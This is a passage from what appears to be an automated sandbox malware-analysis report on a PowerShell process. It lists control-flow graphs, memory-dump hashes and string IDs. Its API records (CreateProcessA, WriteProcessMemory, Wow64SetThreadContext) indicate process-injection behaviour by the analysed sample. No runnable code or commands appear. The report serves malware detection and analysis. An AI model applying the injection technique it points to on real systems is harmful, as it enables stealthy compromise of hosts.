3403->3400 3410->3373 3412 68e614a-68e622e 3410->3412 3412->3373 3423 68e6230-68e6277 3412->3423 3423->3388
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q
                                                                                                • API String ID: 0-2697143702
                                                                                                • Opcode ID: 95d5f913daae9ac81547fb78439fa7438c47161051530a2e2d697d3a1980ff4a
                                                                                                • Instruction ID: f53a8cb4244967961b8f9795a66ac0ba6cf38feeb260d36b9421d07e5a5fc8dc
                                                                                                • Opcode Fuzzy Hash: 95d5f913daae9ac81547fb78439fa7438c47161051530a2e2d697d3a1980ff4a
                                                                                                • Instruction Fuzzy Hash: B9C230B4A002149FD754CB54C890BA9B7B2EF95304F54C1E9DA09AF391CB72ED86CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3428 671eec0-671eed2 3429 671efc6-671efeb 3428->3429 3430 671eed8-671eeda 3428->3430 3432 671eff2-671f016 3429->3432 3431 671eee0-671eeec 3430->3431 3430->3432 3436 671ef00-671ef10 3431->3436 3437 671eeee-671eefa 3431->3437 3444 671f01d-671f041 3432->3444 3436->3444 3445 671ef16-671ef24 3436->3445 3437->3436 3437->3444 3448 671f048-671f0bc 3444->3448 3445->3448 3449 671ef2a-671ef31 call 671eec0 3445->3449 3473 671f0ed-671f0ee 3448->3473 3474 671f0be-671f0cd call 671c408 3448->3474 3451 671ef37-671ef80 3449->3451 3466 671efa3-671efc3 call 671d150 3451->3466 3467 671ef82-671ef9b 3451->3467 3467->3466 3478 671f0f8-671f0fa 3473->3478 3480 671f0d2-671f0e0 call 671e350 3474->3480 3480->3478 3483 671f0e2-671f0e8 3480->3483 3484 671f0ea 3483->3484 3485 671f0ec 3483->3485 3484->3478 3485->3473
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$Hbq
                                                                                                • API String ID: 0-4081012451
                                                                                                • Opcode ID: 9d6576193aba6995142d8c338b6deebab90dca67e0232277aec9dcfab7341723
                                                                                                • Instruction ID: 190910a0b80dad60c026a54f92f498b1125e88a0e6d63c6928cd144211012413
                                                                                                • Opcode Fuzzy Hash: 9d6576193aba6995142d8c338b6deebab90dca67e0232277aec9dcfab7341723
                                                                                                • Instruction Fuzzy Hash: DE51C034B006108FC7A9AF3CD85462E77A7AFC5311B20846ED9068F3A1CE39ED42CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3487 6fe482f-6fe485d 3489 6fe485f-6fe486b 3487->3489 3490 6fe486d 3487->3490 3491 6fe486f-6fe4871 3489->3491 3490->3491 3492 6fe48fe-6fe4908 3491->3492 3493 6fe4877-6fe488f 3491->3493 3494 6fe490a-6fe4910 3492->3494 3495 6fe4913-6fe4919 3492->3495 3500 6fe48a9-6fe48d2 3493->3500 3501 6fe4891-6fe4897 3493->3501 3497 6fe491f-6fe492b 3495->3497 3498 6fe491b-6fe491d 3495->3498 3499 6fe492d-6fe494a 3497->3499 3498->3499 3510 6fe494d-6fe4952 3500->3510 3511 6fe48d4 3500->3511 3503 6fe489b-6fe48a7 3501->3503 3504 6fe4899 3501->3504 3503->3500 3504->3500 3510->3511 3512 6fe48d9-6fe48e2 3511->3512 3514 6fe48e9-6fe48f8 3512->3514 3514->3492
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q
                                                                                                • API String ID: 0-355816377
                                                                                                • Opcode ID: 782167c941387ee1a05957b469d81e2efff420a5011f803bb0c5ff605a456385
                                                                                                • Instruction ID: dbf1507640ab3876a3cf1fc9bfb4b7741ec7e2f2d26dfd56c8c7e4bc0a8c5412
                                                                                                • Opcode Fuzzy Hash: 782167c941387ee1a05957b469d81e2efff420a5011f803bb0c5ff605a456385
                                                                                                • Instruction Fuzzy Hash: 0B113A36F083845BE7615729981072A7FE29FC2614F98859EE544EF2D6DA34DA08C362

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3515 6fe4954-6fe4980 3516 6fe4982-6fe498e 3515->3516 3517 6fe4990 3515->3517 3518 6fe4992-6fe4994 3516->3518 3517->3518 3519 6fe4a0f-6fe4a19 3518->3519 3520 6fe4996-6fe49a1 3518->3520 3523 6fe4a1b-6fe4a22 3519->3523 3524 6fe4a25-6fe4a2b 3519->3524 3521 6fe49bf 3520->3521 3522 6fe49a3-6fe49a9 3520->3522 3527 6fe49c1-6fe49cd 3521->3527 3525 6fe49af-6fe49bb 3522->3525 3526 6fe49ab-6fe49ad 3522->3526 3528 6fe4a2d-6fe4a2f 3524->3528 3529 6fe4a31-6fe4a3d 3524->3529 3530 6fe49bd 3525->3530 3526->3530 3527->3519 3536 6fe49cf-6fe49d6 3527->3536 3531 6fe4a3f-6fe4a5b 3528->3531 3529->3531 3530->3527 3537 6fe4a5e-6fe4a69 3536->3537 3538 6fe49dc-6fe49e1 3536->3538 3540 6fe49f9-6fe4a02 3538->3540 3541 6fe49e3-6fe49e9 3538->3541 3546 6fe4a07-6fe4a0c 3540->3546 3542 6fe49ed-6fe49f7 3541->3542 3543 6fe49eb 3541->3543 3542->3540 3543->3540
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q
                                                                                                • API String ID: 0-355816377
                                                                                                • Opcode ID: 9f0df14a82a7c48bb3672242e73abf2be4cc3f058da5d9e64f3f9fea208b55d7
                                                                                                • Instruction ID: 7bef5bb78048f1d06aa585a952295ab55b36709fbf19e4a773a46e5ff608474a
                                                                                                • Opcode Fuzzy Hash: 9f0df14a82a7c48bb3672242e73abf2be4cc3f058da5d9e64f3f9fea208b55d7
                                                                                                • Instruction Fuzzy Hash: 32110831E08245DFD7528F14DA50A66BFF2EF8121071881AFD808EB25AD632C845CB61

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3548 6fe6328-6fe633a 3549 6fe6402-6fe640c 3548->3549 3550 6fe6340-6fe6347 3548->3550 3551 6fe640e-6fe6417 3549->3551 3552 6fe641a-6fe6420 3549->3552 3553 6fe634d-6fe6352 3550->3553 3554 6fe6453-6fe6485 3550->3554 3555 6fe6426-6fe6432 3552->3555 3556 6fe6422-6fe6424 3552->3556 3557 6fe636a-6fe6373 3553->3557 3558 6fe6354-6fe635a 3553->3558 3565 6fe6487-6fe6493 3554->3565 3566 6fe6495 3554->3566 3559 6fe6434-6fe6450 3555->3559 3556->3559 3562 6fe6377-6fe6383 3557->3562 3563 6fe6375 3557->3563 3560 6fe635e-6fe6368 3558->3560 3561 6fe635c 3558->3561 3560->3557 3561->3557 3568 6fe6385-6fe639b 3562->3568 3563->3568 3570 6fe6497-6fe6499 3565->3570 3566->3570 3568->3554 3576 6fe63a1-6fe63c1 3568->3576 3573 6fe649b-6fe64b3 3570->3573 3574 6fe6507-6fe6511 3570->3574 3583 6fe64cf 3573->3583 3584 6fe64b5-6fe64bb 3573->3584 3577 6fe651c-6fe6522 3574->3577 3578 6fe6513-6fe6519 3574->3578 3589 6fe63db-6fe63e7 3576->3589 3590 6fe63c3-6fe63c9 3576->3590 3581 6fe6528-6fe6534 3577->3581 3582 6fe6524-6fe6526 3577->3582 3586 6fe6536-6fe654e 3581->3586 3582->3586 3592 6fe64d1 3583->3592 3587 6fe64bd-6fe64bf 3584->3587 3588 6fe64c1-6fe64c3 3584->3588 3593 6fe64cd 3587->3593 3588->3593 3598 6fe63ec-6fe63ff 3589->3598 3594 6fe63cd-6fe63d9 3590->3594 3595 6fe63cb 3590->3595 3596 6fe64d3-6fe64e4 3592->3596 3593->3592 3594->3589 3595->3589 3603 6fe64e6-6fe64e8 3596->3603 3604 6fe64ea-6fe64f6 3603->3604 3605 6fe64f8 3603->3605 3606 6fe64fa-6fe64fc 3604->3606 3605->3606 3606->3574 3607 6fe64fe-6fe6504 3606->3607
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$tP^q
                                                                                                • API String ID: 0-1785267070
                                                                                                • Opcode ID: 0c0eaf8f403d9b68538699883cd55b5e83230389d08c133b91bca9b627321900
                                                                                                • Instruction ID: 7c112324e6617310f02918b2bf44c98d7fec6486edddeb6b9fefe5ccc5858f70
                                                                                                • Opcode Fuzzy Hash: 0c0eaf8f403d9b68538699883cd55b5e83230389d08c133b91bca9b627321900
                                                                                                • Instruction Fuzzy Hash: 88119071E012189FDB64CF54C846B6ABFE2BBA4720F18C469E908AF345C772E805C7E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 76b01e1a43e362669cccd8b71be9d5813a9f94749440d107770a77084fab06e8
                                                                                                • Instruction ID: 03a2b18e7f5c080ab9e3b5b9e87eff32e0fd0386aeb07fdce5324b2cb1944deb
                                                                                                • Opcode Fuzzy Hash: 76b01e1a43e362669cccd8b71be9d5813a9f94749440d107770a77084fab06e8
                                                                                                • Instruction Fuzzy Hash: 77122974E01204DFEB54DB98C591A6ABBB2FF98304F54C069E909AB355CB72EC46CB81
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: fb8388624a01cf0d2929ed6a2137fe9beaf2c54cfc36f6378117ab1f3295b10f
                                                                                                • Instruction ID: 721e19c11cc649875184958ae007d2ee38e0417f22b148c68765c6ed6492dd8d
                                                                                                • Opcode Fuzzy Hash: fb8388624a01cf0d2929ed6a2137fe9beaf2c54cfc36f6378117ab1f3295b10f
                                                                                                • Instruction Fuzzy Hash: BB122874E01204DFDB64DB98C584E6ABBB2FF99304F54C069E909AB355CB32EC46CB81
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06948CFA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 174bc8f83000dabfbc1f14189f318755baa210a5d2ec6502bd5a4ef9869e8f86
                                                                                                • Instruction ID: e6c7005ce80c58197868ca67ba84bbca1548f0687de8f5140907b4c347ffef18
                                                                                                • Opcode Fuzzy Hash: 174bc8f83000dabfbc1f14189f318755baa210a5d2ec6502bd5a4ef9869e8f86
                                                                                                • Instruction Fuzzy Hash: 8F814AB1D006498FDB50EFA9C981BDDBBF1BF48314F24852AE855A7644D7749881CF81
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06949C10
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 3835973e48ddfd5821d9ce4dc77976af7857402d900a2f13d75027cece00965c
                                                                                                • Instruction ID: 4a4e9d5e118408bdc9dd458bb4f7ae97517faaa65e60faf21220313bbac7ebc1
                                                                                                • Opcode Fuzzy Hash: 3835973e48ddfd5821d9ce4dc77976af7857402d900a2f13d75027cece00965c
                                                                                                • Instruction Fuzzy Hash: 882148B59003499FCB10DFA9C885BDEBBF5FF88320F10842AE519A7240C7789954DBA4
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06949C10
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: 66f21761d5b2640166c0a638d9fc3d2ed87e23d18ef8e738b5952c12e6c61a9e
                                                                                                • Instruction ID: dbc456978ffd730c19eb93bf931c741e9334100a51842c8e0a955f7d12f086fb
                                                                                                • Opcode Fuzzy Hash: 66f21761d5b2640166c0a638d9fc3d2ed87e23d18ef8e738b5952c12e6c61a9e
                                                                                                • Instruction Fuzzy Hash: 322125B5D003499FCB10DFAAC885BDEBBF5FF48320F10842AE919A7240C7789954DBA4
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0694935E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 03fe70c803716f013661aec8cd47ac75d65c48b627dcd34d7320a8244e47c10f
                                                                                                • Instruction ID: c867368131224324cf36f10098beca5015f6bb65f6c9aa04cad6248c25af1fe3
                                                                                                • Opcode Fuzzy Hash: 03fe70c803716f013661aec8cd47ac75d65c48b627dcd34d7320a8244e47c10f
                                                                                                • Instruction Fuzzy Hash: 8B2148B1D003098FDB14DFAAC885BEEBBF4EF48320F148429D519A7240CB78A945CFA4
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0694935E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: d1f02b0779e4dd687fbb872306b6d4719fd864b9779ac12cb52a61f362cd4d3f
                                                                                                • Instruction ID: c831deb64dea1886bcb58d10095f147c7ff23066752f3f601134025766afa5b2
                                                                                                • Opcode Fuzzy Hash: d1f02b0779e4dd687fbb872306b6d4719fd864b9779ac12cb52a61f362cd4d3f
                                                                                                • Instruction Fuzzy Hash: 15213AB1D003098FDB14DFAAC485BEEBBF4EF48324F148429D419A7240CB789945CFA4
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0694935E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541973748.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6940000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 34c1d4bb1b582b91cc91b8f8eeea8ee7c7b1dc8accfc0da0893adaca98231d86
                                                                                                • Instruction ID: ee77219a41884a489470ec9f27ca1d23bbbbe3f07f9e050c1c12cb876392a3d8
                                                                                                • Opcode Fuzzy Hash: 34c1d4bb1b582b91cc91b8f8eeea8ee7c7b1dc8accfc0da0893adaca98231d86
                                                                                                • Instruction Fuzzy Hash: F51121728013088FE754FB69C8097EFBBF9DF81324F54806AD159A7290CF386845CB61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq
                                                                                                • API String ID: 0-149360118
                                                                                                • Opcode ID: 74a19f125d391315275cd286979630888b264448292b858a528218bf98fdaf2b
                                                                                                • Instruction ID: 6d57dca3998ae7f20fc7c7cc9d0a7ac2cdccbfc1899792306b0538ed358c80f0
                                                                                                • Opcode Fuzzy Hash: 74a19f125d391315275cd286979630888b264448292b858a528218bf98fdaf2b
                                                                                                • Instruction Fuzzy Hash: 3651B335A006159FCB14CF6CC48496AFBB1FF89720F1585A6D6159B292C730F995CBD0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q
                                                                                                • API String ID: 0-74704288
                                                                                                • Opcode ID: 43ee731508e9503558d99bda4c6ad6e1b974d06c2f2571a4f9b6445ebdb3e30d
                                                                                                • Instruction ID: 7b367e8c5d0117394821fbbe29ed43f1adc62dbe150cc7fb45b766a947623156
                                                                                                • Opcode Fuzzy Hash: 43ee731508e9503558d99bda4c6ad6e1b974d06c2f2571a4f9b6445ebdb3e30d
                                                                                                • Instruction Fuzzy Hash: 9E21D3B0E0060ADFEBA4CF58C849BAEB7B2FF42314F048466E614CB191C7B5D884CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: p<^q
                                                                                                • API String ID: 0-1680888324
                                                                                                • Opcode ID: c4a521a2adf56716146c8e5e974eb957c3f3efe2a384ff19bd2dbeccd28722ce
                                                                                                • Instruction ID: f3927d8933d9d35a3331560130a2c1cbe0b367daf8f31968bf5abda0ccd5697f
                                                                                                • Opcode Fuzzy Hash: c4a521a2adf56716146c8e5e974eb957c3f3efe2a384ff19bd2dbeccd28722ce
                                                                                                • Instruction Fuzzy Hash: 6A218E307001959FCB51CF2EC840EAA7BE9AF8A210F154096FC14CF361DA39DC51DB60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: dcee0003277c20bf3d01b9782fa84d7cef4f4cb8ff44c304493dc6ca5490c8b0
                                                                                                • Instruction ID: e74c872b657e422d9d621c32d5d9a462daf9ff31a811fd62b0a80e06032af990
                                                                                                • Opcode Fuzzy Hash: dcee0003277c20bf3d01b9782fa84d7cef4f4cb8ff44c304493dc6ca5490c8b0
                                                                                                • Instruction Fuzzy Hash: A31186B0E40208CFDBA4DF69C44477E77E5AF86754F1880AAD909EB291D731D941CBA3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: b
                                                                                                • API String ID: 0-1908338681
                                                                                                • Opcode ID: 716221382cf914e9af3ee4b275ceefafb81ac37da4b1c19948fd0522fea66738
                                                                                                • Instruction ID: ce0d3eee6978ee8879b5881d0161398afb8763417be1847688472adda4ee001c
                                                                                                • Opcode Fuzzy Hash: 716221382cf914e9af3ee4b275ceefafb81ac37da4b1c19948fd0522fea66738
                                                                                                • Instruction Fuzzy Hash: FEF0C4B0A4022ACFEBA0CF29C848BE9B7B1FB05306F0144E69119AA240CB745AC4DF52
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q
                                                                                                • API String ID: 0-388095546
                                                                                                • Opcode ID: 7b5c313f45a5ac395f43a86757b3a84df253b5c70cff7e7304400c0007edf2d0
                                                                                                • Instruction ID: 7f4cdf83ae6ad9fc310049a2df5f65d1126cbdf96a0fa3feec9fdd99dccdc77f
                                                                                                • Opcode Fuzzy Hash: 7b5c313f45a5ac395f43a86757b3a84df253b5c70cff7e7304400c0007edf2d0
                                                                                                • Instruction Fuzzy Hash: 5EE0DF32E493C28FE7770B60DA10644BF326B92A00B0E81DBC0409F1A3E534C9C5C381
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2540854855.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6710000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 3a716408c55d51830193eb047d8983651078a6fdf91d02d3e8d96bc012a92332
                                                                                                • Instruction ID: a259ddf831865a06b0f4f187354eebae6e9438b58b6fb6259585cb9885676c51
                                                                                                • Opcode Fuzzy Hash: 3a716408c55d51830193eb047d8983651078a6fdf91d02d3e8d96bc012a92332
                                                                                                • Instruction Fuzzy Hash: 25F0FEB490015A8FCB64DF28C9947E9BBB1FB48310F1040E5D919A7754DF306E85DF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: af1b9323b793e8342e317eefc718d796c957db120c8aa25d393d87f267e0db61
                                                                                                • Instruction ID: d6d481966115a240d3a0ce9940e822d9902bcf07cc4d91a92c279215e63b9a8e
                                                                                                • Opcode Fuzzy Hash: af1b9323b793e8342e317eefc718d796c957db120c8aa25d393d87f267e0db61
                                                                                                • Instruction Fuzzy Hash: 7C622934F00214CFE754CB58C881BA9BBB2AF89314F55C099D919AB356CB72ED86CF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d50298f604372ff6cd71b15a196a422b696beef9f67d6c334f0f550d9a5c51e9
                                                                                                • Instruction ID: 4e8f8f7bf9f39b85ec49627795af80acd8770efd27c7ea005de60a0291ae4059
                                                                                                • Opcode Fuzzy Hash: d50298f604372ff6cd71b15a196a422b696beef9f67d6c334f0f550d9a5c51e9
                                                                                                • Instruction Fuzzy Hash: 95621834F00214CFEB54CB58C981B69BBB2AF89304F55C099D919AB356CB72ED86CF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f4742510d070e2e182c8708e29c1f3a33b65fbe554e0ee26d3ea88bea0ff1e7
                                                                                                • Instruction ID: ac87531c2af699a2423ef16eaa91658e80488fe01d00af1b74daa4fcd54bcb6c
                                                                                                • Opcode Fuzzy Hash: 0f4742510d070e2e182c8708e29c1f3a33b65fbe554e0ee26d3ea88bea0ff1e7
                                                                                                • Instruction Fuzzy Hash: 00421834B00214CFE754CB58C891F69BBB2AF89304F55C099D919AB356CB72ED86CFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7aa07d3568ad08c5e14be9b735e677529f6dffc32e5167626af6ae62534f18d9
                                                                                                • Instruction ID: 949f58bde5f927a7cb921bcc92d111f446259ec2aecf43fb7aa2843da7c77582
                                                                                                • Opcode Fuzzy Hash: 7aa07d3568ad08c5e14be9b735e677529f6dffc32e5167626af6ae62534f18d9
                                                                                                • Instruction Fuzzy Hash: A6E18D35A00208DFDB14EFA4D994BADBBF2EF84314F14C469E405AB395DB35AC56CB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 31a10a97386b7fd26202ae09e39284d0433c3ee192ba8df9f21422b1f4c61e09
                                                                                                • Instruction ID: 2388dc1508c64271cd2164384c2f0fc8f733397425ca88e65006a42545e99711
                                                                                                • Opcode Fuzzy Hash: 31a10a97386b7fd26202ae09e39284d0433c3ee192ba8df9f21422b1f4c61e09
                                                                                                • Instruction Fuzzy Hash: 03C11974B01258AFCB45CFA8D484A9EBBF2BF48310F198159E849AB391C735ED95CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2508441132.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_40a0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 71c625d8225b87a5a899720229ba967580e00e2b1cb31d870277f74dbd627c89
                                                                                                • Instruction ID: f66da9393a9e25ea2353cd680985c12b3197a1a454dd5b733c44f49fd57efb71
                                                                                                • Opcode Fuzzy Hash: 71c625d8225b87a5a899720229ba967580e00e2b1cb31d870277f74dbd627c89
                                                                                                • Instruction Fuzzy Hash: 7BB1E474A01218EFDB55CFA8D484A9DBBF2FF88310F248559E805AB365C771ED92CB90
                                                                                                Memory Dump Source
